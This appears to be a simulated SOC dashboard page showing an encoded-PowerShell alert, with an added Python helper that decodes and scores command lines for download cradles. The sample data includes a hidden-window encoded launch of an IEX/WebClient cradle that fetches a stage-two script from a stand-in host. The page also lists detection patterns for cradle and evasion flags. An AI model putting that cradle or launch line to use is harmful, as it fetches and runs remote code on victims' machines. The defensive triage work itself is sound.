Interactive Demo — Simulated data only.
SOC365 Dashboard
Acme Legal Services Ltd · Live · 15:26:11 UTC

Suspicious PowerShell Execution

High · Investigating
ALR-00500 · 2026-04-10T13:21:28Z

Description

Encoded PowerShell command executed on AP-WIFI-03 by user 'l.johnson'. The command attempts to download and execute a remote payload. Flagged by DLP Module.
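What an analyst does first with an alert like this is recover the script behind the encoded argument and check it for a download cradle. The helper below is an added example written for this page, not SOC365 or EmilyAI code. It assumes the process-creation event carries the full command line, that the encoded form is PowerShell's -EncodedCommand argument (base64 of UTF-16LE text), and that the indicator lists cover only the most common cradle patterns. The host and user are taken from the alert above; the command line, script and URL are constructed sample data.

```python
"""Triage helper for an encoded-PowerShell alert (illustrative, not SOC365 code).

Assumptions (not from the dashboard): the log line exposes the full command line;
the encoded payload follows a -EncodedCommand style flag and is base64 of UTF-16LE
text; the indicator tables below list common patterns, not an exhaustive set.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often in the wild (assumption: common cases only).
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Download-and-execute indicators looked for in the decoded script: pattern -> label.
CRADLE_INDICATORS = {
    r"\bNet\.WebClient\b": "WebClient",
    r"\.Download(?:String|File|Data)\(": "WebClient download",
    r"\b(?:Invoke-WebRequest|iwr|curl|wget)\b": "Invoke-WebRequest",   # incl. aliases
    r"\b(?:Invoke-RestMethod|irm)\b": "Invoke-RestMethod",
    r"\bStart-BitsTransfer\b": "BITS transfer",
    r"\b(?:Invoke-Expression|iex)\b": "Invoke-Expression",
    r"https?://[^\s'\"]+": "remote URL",
}

# Launch flags that hide the session from the user; suspicious but not proof of malice.
EVASION_FLAGS = {
    r"[-/](?:w|windowstyle)\s+hidden": "hidden window",
    r"[-/](?:nop|noprofile)\b": "no profile",
    r"[-/](?:noni|noninteractive)\b": "non-interactive",
    r"[-/](?:ep|executionpolicy)\s+bypass": "execution policy bypass",
}


@dataclass
class Triage:
    host: str
    user: str
    encoded: bool
    decoded_script: Optional[str]
    cradle_hits: List[str] = field(default_factory=list)
    evasion_hits: List[str] = field(default_factory=list)
    technique: str = "T1059.001"   # Command and Scripting Interpreter: PowerShell
    verdict: str = "benign"


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand value; None if it is not base64 of UTF-16LE bytes."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:   # an odd byte count cannot be UTF-16LE, so it would not run
        return None
    return raw.decode("utf-16le", errors="replace")


def triage_process_event(host: str, user: str, command_line: str) -> Triage:
    """Decode the command line when encoded and score it for download cradles."""
    m = ENCODED_FLAG.search(command_line)
    script = decode_encoded_command(m.group(1)) if m else None
    # Score the decoded script when we have one, otherwise the visible command line.
    text = script if script is not None else command_line
    t = Triage(host=host, user=user, encoded=m is not None, decoded_script=script)
    for pat, label in CRADLE_INDICATORS.items():
        if re.search(pat, text, re.IGNORECASE):
            t.cradle_hits.append(label)
    for pat, label in EVASION_FLAGS.items():
        if re.search(pat, command_line, re.IGNORECASE):
            t.evasion_hits.append(label)
    fetches = "remote URL" in t.cradle_hits
    executes = "Invoke-Expression" in t.cradle_hits
    if fetches and executes:
        t.verdict = "download-and-execute"   # the behaviour the alert describes
    elif t.cradle_hits:
        t.verdict = "cradle-indicators"
    elif t.encoded and t.evasion_hits:
        t.verdict = "suspicious-launch"
    return t


# Constructed sample event: host/user from the alert, command line and URL invented.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_EVENT = {
    "host": "AP-WIFI-03",
    "user": "l.johnson",
    "command_line": f"powershell.exe -NoP -NonI -W Hidden -Enc {SAMPLE_ENCODED}",
}


def triage_sample() -> Triage:
    return triage_process_event(**SAMPLE_EVENT)


if __name__ == "__main__":
    r = triage_sample()
    print(f"{r.host} {r.user} {r.technique} verdict={r.verdict}")
    print("decoded:", r.decoded_script)
    print("cradle:", r.cradle_hits, "evasion:", r.evasion_hits)
```

The decode step is deliberately strict: a value that is not valid base64, or that decodes to an odd number of bytes, is reported as not decodable rather than scored, because powershell.exe would not have run it either and the analyst should look at the raw line instead. Verdicts only reach "download-and-execute" when both a remote URL and Invoke-Expression appear, which is the combination the alert description asserts; an encoded launch with only hidden-window flags is reported as "suspicious-launch" so it is not closed as benign.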

Alert Metadata

Alert ID
ALR-00500
Timestamp
2026-04-10T13:21:28Z
Severity
High
Status
Investigating
Detection Source
DLP Module
Assigned Analyst
James Okonkwo

Endpoint Information

Hostname
AP-WIFI-03
User Account
l.johnson
Source IP
185.33.220.206
Destination IP
10.3.117.201
Origin Country
IN India

MITRE ATT&CK Mapping

Tactic
Execution
Technique
T1059.001
Reference
https://attack.mitre.org/techniques/T1059/001/

Investigation Timeline

13:21:28 Event ingested by SOC365 Engine
13:21:32 EmilyAI triage started — correlation enrichment
13:21:33 EmilyAI confidence: 97% — escalated to human analyst
13:22:08 Alert assigned to analyst: James Okonkwo
13:24:03 Investigation started — querying SIEM and threat intelligence

Related Alerts

ID · Time · Alert · Severity · Status · Host
ALR-00157 · 2h ago · Suspicious PowerShell Execution · Medium · Resolved · WS-LAP-012
ALR-00447 · 4h ago · Shadow IT Discovery · Medium · False Positive · AP-WIFI-03
ALR-00354 · 4h ago · Suspicious PowerShell Execution · Informational · False Positive · WS-MAC-005
ALR-00467 · 17h ago · Malware Signature Match · Low · Open · AP-WIFI-03
ALR-00087 · 1d ago · Insider Threat Indicator · Informational · Investigating · AP-WIFI-03